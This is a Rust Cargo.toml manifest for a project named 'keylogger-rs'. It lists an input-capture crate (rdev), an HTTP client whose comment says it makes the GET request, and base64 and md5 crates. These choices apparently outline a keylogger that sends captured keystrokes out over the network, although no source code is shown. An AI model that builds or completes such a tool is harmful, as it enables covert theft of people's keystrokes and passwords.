[package]
name = "keylogger-rs"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
md5 = "*" # For getting hash of data
rdev = "*" 
reqwest = {version = "*", features = ["blocking", "hyper-rustls"]} # Makes the GET request
base64-url = "1.4.10" # Convert base64 to text

[[bin]]
name = "keylogger"
path = "src/main.rs"

[lib]
name = "keylogger"
path = "src/lib.rs"